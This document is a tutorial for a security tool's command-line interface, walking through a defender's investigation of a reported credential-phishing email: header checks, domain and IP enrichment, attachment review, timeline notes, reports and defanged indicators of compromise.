Phishing Investigation¶
A complete walkthrough of investigating a reported phishing email.
Scenario¶
A user forwards a suspicious email to the security team. The email claims to be from "IT Support" and asks the user to verify their account credentials.
What we'll cover:
- Initial analysis of the email
- Deep dive into headers and IOCs
- Checking threat intelligence
- Analyzing attachments
- Documenting findings
- Generating a report
Step 1: Create a Case¶
Start by creating an investigation case to track all evidence:
Output
Step 2: Initial Email Analysis¶
Add the email to the case and perform initial analysis:
# Add email as evidence
bsot case add suspicious.eml
# Quick analysis
bsot phishing analyze suspicious.eml
Sample Output
π§ Phishing Analysis: suspicious.eml
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Risk Score: HIGH (8/10) β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β From: "IT Support" <support@company-secure.net> β
β To: victim@yourcompany.com β
β Subject: Urgent: Verify your account immediately β
β Date: 2025-01-15 09:15:32 UTC β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β οΈ Authentication Failures
SPF: FAIL
DKIM: FAIL
DMARC: FAIL
π URLs Found (1)
β οΈ hxxps://company-secure[.]net/verify?token=abc123
ββ Suspicious: Domain registered 3 days ago
π Attachments (1)
verify_account.html (12.4 KB)
ββ β οΈ HTML file with form elements
π Extracted IOCs
Domains: company-secure.net
IPs: 185.234.72.45
Key findings: - All email authentication failed (SPF, DKIM, DMARC) - Suspicious domain registered recently - HTML attachment with form (likely credential harvester)
Step 3: Analyze Email Headers¶
Get detailed header information:
Sample Output
ββ Authentication ββββββββββββββββββββββββββββββββββββββββ
SPF: FAIL
DKIM: FAIL
DMARC: FAIL
Score: 0/100
ββ Sender Information ββββββββββββββββββββββββββββββββββββ
Header From: support@company-secure.net
Envelope From: bounce@mail.evil-server.ru
Reply-To: support@company-secure.net
[HIGH] From domain mismatch detected!
ββ Routing βββββββββββββββββββββββββββββββββββββββββββββββ
Mail hops: 2
Origin IP: 185.234.72.45 (evil-server.ru)
Key findings: - Envelope-From domain is completely different (evil-server.ru) - Origin IP is from Russia
Step 4: Domain Intelligence¶
Check the suspicious domain:
Sample Output
ββ WHOIS: company-secure.net βββββββββββββββββββββββββββββ
ββ Registrar βββββββββββββββββββββββββββββββββββββββββββββ
Namecheap, Inc.
ββ Dates βββββββββββββββββββββββββββββββββββββββββββββββββ
Created: 2025-01-12
Age: 3 days
[HIGH] Domain is only 3 days old - likely malicious
ββ Registrant ββββββββββββββββββββββββββββββββββββββββββββ
π WHOIS Privacy Protection: Enabled
The domain was registered just 3 days agoβclassic phishing infrastructure.
Step 5: IP Enrichment¶
Enrich the origin IP:
Sample Output
π Enriching ip: 185.234.72.45
β VERDICT: MALICIOUS
β CONFIDENCE: 92%
π Sources: 3 malicious, 0 suspicious, 1 clean
π Country: Russia
π’ ASN: AS12345 Bulletproof Hosting Ltd
π·οΈ Tags: phishing, spam, botnet
ββ Source Details ββββββββββββββββββββββββββββββββββββββββ
VIRUSTOTAL: MALICIOUS
Detection: 8/90
ABUSEIPDB: MALICIOUS
Abuse Score: 100%
Reports: 847
Confirmed malicious IP with extensive abuse history.
Step 6: Analyze Attachment¶
Check the HTML attachment:
Sample Output
The HTML file is a credential harvesting page that posts to steal.php.
Step 7: Document Timeline¶
Add timeline events:
bsot case timeline "Phishing email received by user" --time "2025-01-15 09:15:00"
bsot case timeline "User forwarded email to security team" --time "2025-01-15 09:45:00"
bsot case timeline "Analysis confirmed credential harvesting attempt"
Step 8: Add Investigation Notes¶
bsot case note "Confirmed phishing attack targeting company credentials"
bsot case note "Attacker infrastructure: company-secure.net (registered 3 days ago)"
bsot case note "No evidence user clicked link or submitted credentials"
bsot case note "Recommend blocking domain at email gateway and proxy"
Step 9: Generate Report¶
Generate a report for stakeholders:
# Executive summary for management
bsot report generate --template executive -o executive_summary.md
# Technical report with IOCs
bsot report generate --template technical -o technical_report.md
# Export IOCs for blocklists
bsot report ioc --format csv -o iocs.csv
Step 10: Close the Case¶
Summary¶
| Step | Command | Purpose |
|---|---|---|
| 1 | bsot case new |
Create investigation case |
| 2 | bsot phishing analyze |
Initial email analysis |
| 3 | bsot phishing headers |
Detailed header inspection |
| 4 | bsot intel whois |
Domain age and registration |
| 5 | bsot intel enrich |
IP reputation check |
| 6 | bsot file strings |
Attachment analysis |
| 7 | bsot case timeline |
Document timeline |
| 8 | bsot case note |
Add findings |
| 9 | bsot report generate |
Create reports |
| 10 | bsot case close |
Close investigation |
Indicators of Compromise¶
| Type | Value | Description |
|---|---|---|
| Domain | company-secure.net | Phishing domain |
| IP | 185.234.72.45 | Mail server origin |
| URL | hxxps://company-secure[.]net/verify | Credential harvester |
| support@company-secure.net | Sender address |
Recommendations¶
- Block the domain at email gateway and web proxy
- Block the IP at firewall
- User awareness β remind users about phishing indicators
- Password reset β if user submitted credentials
- Monitor β watch for similar patterns